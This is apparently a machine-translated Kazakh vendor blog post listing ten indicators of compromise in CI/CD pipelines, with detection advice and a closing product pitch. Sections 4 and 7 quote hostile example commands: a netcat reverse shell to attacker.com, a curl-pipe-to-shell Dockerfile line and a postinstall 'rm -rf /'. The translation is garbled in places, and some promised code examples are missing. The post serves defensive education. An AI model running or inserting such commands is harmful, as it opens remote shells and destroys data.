Келісімге келудің ең жақсы 10 көрсеткіші CI/CD Pipelines

Кіріспе: Киберқауіпсіздіктегі ымыраға келу көрсеткіштері қандай?

Ықпал ету көрсеткіштері - сіздің жүйеңіздің немесе pipeline шабуылға ұшырауы мүмкін. Қарапайым тілмен айтқанда, келісім көрсеткіштері шабуылдаушылар қалдырған іздері, таңқаларлық сияқты logins, файл өзгерістері немесе жасырын зиянды бағдарлама. Ішінде ХОК киберқауіпсіздігі, олар қылмыс орнында саусақ іздері сияқты әрекет етеді, сізге бірдеңе дұрыс емес екенін анық дәлелдейді. Сондықтан, әзірлеушілер сұраған кезде келісімнің белгілері қандай?жауап тек серверлермен немесе брандмауэрлермен шектелмейді, сонымен қатар қазіргі заманғы жүйелерде жасырынған тәуекелдерді де қамтиды. CI/CD pipelines.

Оларда pipelines, шабуылдаушылар кодты бұрмалап, зиянды тәуелділіктерді енгізе алады немесе құрастыру қадамдарын байқамай өзгерте алады. Дегенмен, көптеген нұсқаулықтар әлі де тек серверлерге немесе желілерге бағытталған. Нәтижесінде, бағдарламалық жасақтама жеткізу тізбегі ең оңай нысаналардың біріне айналды.

Сондықтан ымыраға келу көрсеткіштерін табу CI/CD pipelines өте маңызды. Ең бастысы, ол командаларға зиянды бағдарламаларды блоктауға, құпияларды қорғауға және бағдарламалық жасақтаманы жеткізудің әрбір қадамын қауіпсіз етуге көмектеседі.

Келісімге келудің ең жақсы 10 көрсеткіші CI/CD Pipelines

Ықпал ету көрсеткіштерін түсіндірген кезде, көптеген тізімдер серверлерге немесе желілерге бағытталған. Дегенмен, CI/CD pipelines, шабуылдаушылар өте әртүрлі саусақ іздерін қалдырады. Бұл сигналдарды тану проактивті қорғаныс үшін өте маңызды. Төменде әрбір әзірлеуші ​​мен қауіпсіздік инженері ескеруі керек ХОК киберқауіпсіздіктің 10 қауіпті белгісі келтірілген.

1. Күдікті тәуелділік өзгерістері

Келісімшарттың негізгі көрсеткіштерінің бірі pipelines - кенеттен пайда болатын тәуелділік жаңартуы. Шабуылдаушылар қауіпті пакеттерді қосу үшін пакет менеджерлерінде орналастырылған сенімді әзірлеушілерді жиі пайдаланады.

Мысалы, npm a ішінде package.json айырмашылық кенеттен мыналарды қамтуы мүмкін:

Мұндай өзгерістер қауіпсіз болып көрінуі мүмкін, бірақ әрбір құрастыруға трояндық кодты енгізуі мүмкін.

Әсері: Бұзылған құрастырулар зиянды бағдарламаларды бастапқыда мұра етеді.

Анықтау: тәуелділік шолуларын орындау, құлыптау файлының айырмашылықтарын бақылау және жаңа пакеттерді үнемі сканерлеу.

2. Құрастырулардағы шатастырылған код 

Зиянды бағдарлама авторлары шолуларды айналып өту үшін шатастыруға сүйенеді. Нәтижесінде, бұл ымыраға келу көрсеткіші CI/CD pipelines анықтау ең қиын болуы мүмкін. Шын мәнінде, түсініксіз пайдалы жүктемелер көбінесе ашық бастапқы кодты кітапханаларға немесе контейнер кескіндеріне ескертусіз түседі.

Мысалға:

  • PyPI пакеті қолданылады base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Қажет емес UPX екілік файлдарымен толтырылған Docker кескіні.
  • JavaScript толы \x41\x42 құпия деректерді ұрлаушыларды жасырудан қашып құтылады.

Әсері: Жасырын код құрастыру немесе орындау кезінде үнсіз орындалады, бұл оны ХОК киберқауіпсіздігінде маңызды сигнал етеді.
Анықтау: Біріктіріңіз SAST кодталған немесе бумаланған кодты белгілеу үшін зиянды бағдарламаларды сканерлеу арқылы. Ең бастысы, шатастыруды қосымша зерттеуді қажет ететін қауіпті жалауша ретінде қарастырыңыз.

3. Git-те ашылған құпиялар: IOC киберқауіпсіздігінің классикалық қаупі

CI/CD pipelines көбінесе құпияларды репозиторийлерден тікелей мұра етеді. Дегенмен, Git-те құпиялар пайда болған кезде, олар «ымыраға келудің көрсеткіштері қандай?» деген сұраққа ең айқын жауаптардың біріне айналады. pipelines?" Тіркелгі деректері Git-ке түскеннен кейін, шабуылдаушылар оларды шексіз пайдалана алады.

Мысалға:

  • A .env бар файл AWS_SECRET_KEY=.
  • Токендер енгізілді config.json.
  • Құпиялар жойылғаннан кейін де Git тарихында әлі де көрінеді.

Әсері: Ашық кілттер шабуылдаушыларға тікелей қол жеткізуге мүмкіндік береді CI/CD pipelines, бұлттық жүйелер немесе дерекқорлар. Сондықтан бұл ымыраға келудің ең қауіпті көрсеткіштерінің бірі.
Анықтау: пайдалану pre-commit hooks және құпия сканерлеу үшін CI тапсырмаларын орындаңыз және ағып кеткен кілттерді дереу қайтарып алыңыз. Сонымен қатар, экспозиция терезелерін азайту үшін автоматтандырылған қалпына келтіруді енгізіңіз.

4. Бұрмаланған Pipeline Конфигурациялар: Ымыраға келудің жасырын көрсеткіштері

Pipeline конфигурациялар жоғары құнды мақсаттар болып табылады, себебі бір модификация көбінесе бүкіл жұмыс процесін басып аладыНәтижесінде, бұрмаланған pipeline файлдар дәстүрлі бақылау құралдары сирек анықтайтын ХОК киберқауіпсіздігінің негізгі қаупі болып табылады.

Мысалға:

  • GitHub әрекеттерінде:

  • GitLab бағдарламасында: зиянды тапсырма қосылды .gitlab-ci.yml бұл құпия деректерді тастайды.
  • Дженкинсте: sh "nc -e /bin/bash attacker.com 4444".

Әсері: Бұл бекітілмеген өзгерістер сізді өзгертеді pipeline шабуылдаушылар үшін тұрақты артқы есікке айналады, бұл ымыраға келудің көрсеткіші ретінде айқын саналады.
Анықтау: Қол қойылған конфигурацияларды орындау, PR мақұлдауын талап ету және күтпеген тапсырмаларды бақылау. Сонымен қатар, орнату guardrails өзгертілген жұмыс процестерін автоматты түрде блоктайды.

5. артықшылықты IaC Әдепкі параметрлер 

Дұрыс конфигурацияланбаған инфрақұрылым анықтамалары көбінесе жасырын артқы есіктерді жасайды. Нәтижесінде, артықшылықты әдепкі параметрлер IaC ХОК киберқауіпсіздігінің классикалық қаупі болып табылады.

Мысалға:

  • Kubernetes орналастыруға рұқсат беретін подкасттар privileged: true.
  • Helm charts қызметтерін ұсынады 0.0.0.0:22.

Әсері: Шабуылдаушылар түбірлік деңгейдегі қолжетімділікке ие болады немесе ішкі қызметтерді жария түрде көрсетеді. Нәтижесінде, бұл мәселелер шабуыл аймағын айтарлықтай кеңейтеді.
Анықтау: Қолдану IaC біріктіру алдында ең аз артықшылықты қамтамасыз ету үшін сканерлеу. Сонымен қатар, әрбір конфигурацияның бөлігі ретінде қарастырылғанына көз жеткізіңіз pipeline.

6. Ерекше дене бітімі 

Шабуылдаушылар көбінесе өзгереді pipeline зиянды әрекеттерге бой алдыруға тырысу. Басқаша айтқанда, ерекше құрылыс белсенділігі ымыраға келудің қандай көрсеткіштері бар екеніне ең айқын жауаптардың бірі болып табылады. CI/CD pipelines.

Мысалға:

  • Бейтаныс домендерге шығыс желілік сұраныстар жасайтын құрылымдар.
  • Node.js жобасы кенеттен PowerShell бағдарламасын іске қосты npm install.
  • Құрастыру сценарийлерінде анықталмаған үлкен екілік файлдарды жүктеп алу бойынша CI тапсырмасы.

Әсері: Бұзылған құрастырулар зиянды бағдарламаларды тарату нүктелері ретінде қызмет ете алады. Ең бастысы, олар әрбір орналастыру арқылы зиянды пайдалы жүктемелерді таратады.
Анықтау: Күтпеген процестер немесе қосылымдар үшін құрастыру журналдарын бақылаңыз. Сонымен қатар, аномалияларды анықтауды қалыптыдан тыс әрекеттерді белгілеу үшін конфигурациялаңыз.

7. Зиянды пакет сценарийлері ХОК киберқауіпсіздік тәуекелдері ретінде

Пакет менеджерлері өмірлік циклді қолдайды hooks шабуылдаушылар пайдаланатын. Сондықтан, npm, PyPI немесе Docker файлдарындағы зиянды сценарийлер бұзушылықтың күшті көрсеткіштері болып табылады.

Мысалға:

  • мин: postinstall скрипт орындалуда rm -rf / немесе C2-ге маяк қосу.
  • PyPI: setup.py Орнату кезінде жасырын Python кодын орындау.
  • Dockerfile: RUN curl attacker.sh | sh.

Әсері: Шабуыл орнату кезінде, кез келген жұмыс уақытын тексеруден бұрын орындалады. Демек, әзірлеушілер тым кеш болғанша байқамауы мүмкін.
Анықтау: Орнату сценарийлері үшін пакет манифесттерін сканерлеңіз. Сонымен қатар, қауіпті шектеулер hooks in CI/CD әсерді азайтуға арналған жұмыс орындары.

8. Тізілімдегі улану белгілерінің ымыраға келу көрсеткіштері

Шабуылдаушылар тізілімдердегі артефактілерді ауыстырады немесе өзгертеді, және бұл оқиғалар жеткізу тізбегіндегі ымыраға келу көрсеткіштерінің оқулықтағы мысалдары болып табылады. pipelines.

Мысалға:

  • Docker кескін тегі трояндық қабатпен үнсіз жаңартылды.
  • Ішкі қаптама уланған нұсқасымен ауыстырылды.
  • npm атау кеңістігін скваттау, мысалы lodash-proxy.

Әсері: Тізілім артефактін пайдаланатын әрбір құрастыру бұзылады. Сонымен қатар, бұзылу кейінгі қызметтерге де таралады.
Анықтау: Барлық тізілім файлдарында қолтаңба мен тұтастықты тексеруді жүзеге асырыңыз. Сонымен қатар, артефакттың шығу тегін бақылаңыз SBOM валидация.

9. ХОК дәлелі ретінде пайдаланушының аномальды белсенділігі

Бұзылған есептік жазбалар әрқашан дерлік қалыптан тыс із қалдырады. Тиісінше, әзірлеушінің ерекше мінез-құлқы ымыраға келудің күшті көрсеткіші болып табылады.

Мысалға:

  • Commitжергілікті уақыт бойынша таңғы сағат 3-те естілді.
  • Демалыстағы тіркелгілердің PR мақұлдаулары.
  • Pipelines ерекше жиілікпен іске қосылады.

Әсері: Шабуылдаушылар ұрланған тіркелгі деректерін зиянды өзгерістер енгізу үшін пайдаланады. Өйткені, рұқсатсыз commits қалыпты жұмыс процестеріне оңай араласады.
Анықтау: монитор SCM ауытқуларға қарсы белсенділік, MFA-ны қолдану және токендерді үнемі ауыстыру. Сонымен қатар, күдікті жағдайлар туралы ескерту commit немесе бекіту үлгілері.

10. ХОК киберқауіпсіздігіндегі тұтастық немесе қолтаңба тексерулерінің сәтсіз аяқталуы

Кең таралған, бірақ еленбеген келісімнің көрсеткіші тұтастық немесе қолтаңба тексеруі сәтсіз аяқталды. ХОК киберқауіпсіздігінде бұл тексерулер кодтың немесе артефактілердің түпнұсқалығын тексереді. Оларды өткізіп жіберу аяқталады pipelineс ұшыраған.

мысалдар:

  • SHA256 хэші күтілген бақылау қосындысына сәйкес келмейді.
  • GPG қолтаңбасы жоқ немесе жарамсыз.
  • An SBOM қол қойылмаған артефактілерді көрсетеді.

Әсері: Тұтастықтың бұзылуы көбінесе деректердің бұзылуын, тізілімнің улануын немесе зиянды бағдарламалардың енгізілуін білдіреді.

Анықтау: Қолтаңба тексерулерін автоматтандырыңыз, бақылау қосындысын тексеруді жүзеге асырыңыз және қол қойылмаған компоненттерді блоктаңыз. Ең бастысы, әрбір сәтсіз тексеруді бұзушылықтың айқын дәлелі ретінде қарастырыңыз.

CI/CD Ымыраға келу көрсеткіштеріне қысқаша шолу

Келісім көрсеткіші (IOC) Әсер ету CI/CD Pipelines Қалай анықтауға болады
Күдікті тәуелділік өзгерістері Шабуылдаушылар зиянды кітапханаларды пакет менеджерлеріне енгізеді, бұл бұзылған құрастыруларға әкеледі. Құлыптау файлының айырмашылықтарын бақылаңыз, тәуелділіктерді шолуды орындаңыз және тәуелділіктерді үздіксіз сканерлеңіз.
Құрылымдардағы шатастырылған код Жасырын пайдалы жүктемелер құрастыру кезінде немесе жұмыс уақытында анықталмай орындалады. пайдалану SAST және base64, hex немесе packed код үлгілерін белгілеу үшін зиянды бағдарламаларды сканерлеу.
Git-те ашылған құпиялар Ағып кеткен токендер немесе API кілттері шабуылдаушыларға маңызды жүйелерге тікелей қол жеткізуге мүмкіндік береді. Git бағдарламасында құпия сканерлеуді іске қосыңыз hooks және ағып кеткен тіркелгі деректерін автоматты түрде қайтарып алыңыз.
Бұзылған Pipeline Конфигурациялар Өзгертілген жұмыс процестері деректерді шығаруға немесе ішінде сақтауға мүмкіндік береді CI/CD. PR мақұлдауын талап ету, қол қойылған конфигурацияларды орындау және бақылау pipeline өзгерістер.
Артықшылықты IaC Әдепкі параметрлер Тым рұқсат етілген рөлдер немесе қауіпсіз емес әдепкі параметрлер бұлттық орталарды әшкерелейді. Ең аз артықшылықты қолдану үшін Terraform, Kubernetes және Helm файлдарын сканерлеңіз.
Ерекше дене бітімі мінез-құлықтары Pipelineзиянды бағдарламаларды тарату нүктелері немесе бүйірлік қозғалыс үшін пайдаланылады. Күтпеген жүктеулер, процестер немесе шығыс қоңыраулар үшін құрастыру журналдарын талдаңыз.
Зиянды пакет скрипттері Орнатуға дейінгі/орнатудан кейінгі жасырын сценарийлер жұмыс уақытын тексеруден бұрын пайдалы жүктемелерді іске қосады. Қауіпті npm/PyPI скрипттерін бұғаттау және орындауды шектеу CI/CD жұмыс орындары.
Тіркеу уландыруы Трояндалған артефактілер тізілімдердегі сенімді кескіндерді немесе екілік файлдарды ауыстырады. Бақылау қосындыларын тексеріңіз, қолтаңбаны тексеруді қамтамасыз етіңіз және тізілімдерді алдын ала сканерлеңіз.
Пайдаланушының қалыптан тыс әрекеті Бұзылған аккаунттар зиянды әрекеттерді іске қосады commits немесе триггер pipelines. Сыртқы істер министрлігін орындау, бақылау commitауытқулар үшін s және талдау login үлгілер.
Тұтастықты немесе қолтаңбаны тексеру сәтсіз аяқталды Бұрмаланған кодты, тәуелділіктерді немесе кескіндердің енуін көрсетеді pipeline. Тұтастықты тексеруді автоматтандырады және қол қойылмаған немесе сәйкес келмейтін компоненттерді блоктайды.

Неліктен дәстүрлі ХОК киберқауіпсіздігі сәтсіздікке ұшырайды CI/CD тәуекелдер

Көптеген ұйымдар серверлерде, компьютерлерде немесе желілерде бұзушылықтардың белгілерін қазірдің өзінде бақылап отыр. Дегенмен, ХОК киберқауіпсіздігіне қатысты бұл классикалық тәсіл елемейді CI/CD pipelines, олар қазір ең маңызды шабуыл беттерінің бірі болып табылады. Шын мәнінде, pipelines дәстүрлі құралдар анықтай алмайтын бірегей ымыраға келу сигналдарын көрсетеді.

Дәстүрлі қауіпсіздіктегі ымыраға келу көрсеткіштері

Дәстүрлі ХОК киберқауіпсіздігінде әдетте мыналарға баса назар аударылады:

  • әдеттен тыс loginнемесе ұрланған тіркелгі деректерін көрсететін IP мекенжайлары.
  • Зиянды бағдарламаны анықтайтын күдікті файл хэштері немесе тізілім өзгерістері.
  • Деректерді шығаруды көрсететін күтпеген шығыс трафик.

Бұл сондай-ақ бақыланатын белгілі көрсеткіштер MITER ATT&CK құрылымы, бұл қарсыластың жалпы мінез-құлқы мен тактикасын картаға түсіреді. Бұл пайдалы сигналдар. Дегенмен, олар негізінен операциялық жүйелерге немесе корпоративтік желілерге қолданылады. Нәтижесінде, олар бағдарламалық жасақтама жеткізу тізбегінде ертерек болатын нәзік бұрмалауды жіберіп алады.

неге CI/CD Pipelines Әртүрлі

CI/CD pipelines - әзірлеушілер пайдаланатын автоматтандырылған орталар commit код, тарту тәуелділіктері және босату құрастырулары. Шабуылдаушылар мұнда бір ымыраға келу әрбір орналастыруда болатынын біледі. Тиісінше, ымыраға келу көрсеткіштері қандай? CI/CD pipelineОлар өте әртүрлі көрінеді:

  • package.json немесе requirements.txt файлына жасырын түрде қосылған зиянды тәуелділік.
  • Git бағдарламасында API кілттері немесе токендері көрсетілген commits немесе .env файлдары.
  • npm немесе PyPI пакеттеріне енгізілген шатастырылған код.
  • Terraform немесе Kubernetes файлдары, мысалы, артықшылықты: true сияқты қауіпсіз емес әдепкі параметрлермен.
  • Pipeline деректерді сүзгіден шығару немесе артқы есіктерді ашу үшін өңделген тапсырмалар.

Бұл ымыраға келу сигналдары CI/CD көрінбейтін болып қалу standard қауіпсіздік құралдары.

ХОК киберқауіпсіздігіндегі алшақтық

Көптеген топтар ымыраға келу көрсеткіштерінің құндылығын түсінгенімен, олар әлі де тек серверлер мен желі журналдарынан анықтауға ғана сүйенеді. Сондықтан, шабуылдаушылар әдеттегі із қалдырмай, құрастыруларды уландыруы немесе зиянды бағдарламаларды енгізуі мүмкін. Сондықтан XZ Utils артқы есігі немесе зиянды npm пакеттері сияқты оқиғалар өндіріске жеткенше анықталмады.

Жеткізу тізбегіндегі мұндай бұзушылықтар да атап өтіледі CISA компаниясының жеткізу тізбегінің қауіпсіздігі бойынша нұсқаулығышабуылдаушылар барған сайын нысанаға алып жатқанын ескертеді CI/CD pipelineжәне тізілімдер.

Тағамдар

Дәстүрлі ХОК киберқауіпсіздігі қажет, бірақ жеткіліксіз. Ең бастысы, топтар ымыраға келудің нақты көрсеткіштерін мойындауы керек. CI/CD pipelineс. Тек сонда ғана олар зиянды кодты анықтай алады немесе pipeline қоршаған ортаға таралмас бұрын қорлау.

sca-құралдары-бағдарламалық жасақтама-композиция-талдау-құралдары
Бағдарламалық жасақтама тәуекелдеріне басымдық беріңіз, оларды жойыңыз және қауіпсіз етіңіз
Тегін аккаунтыңызды алыңыз.
Несие картасы қажет емес.

Бағдарламалық жасақтаманы әзірлеу және жеткізуді қауіпсіз етіңіз

Xygeni өнім жиынтығымен бірге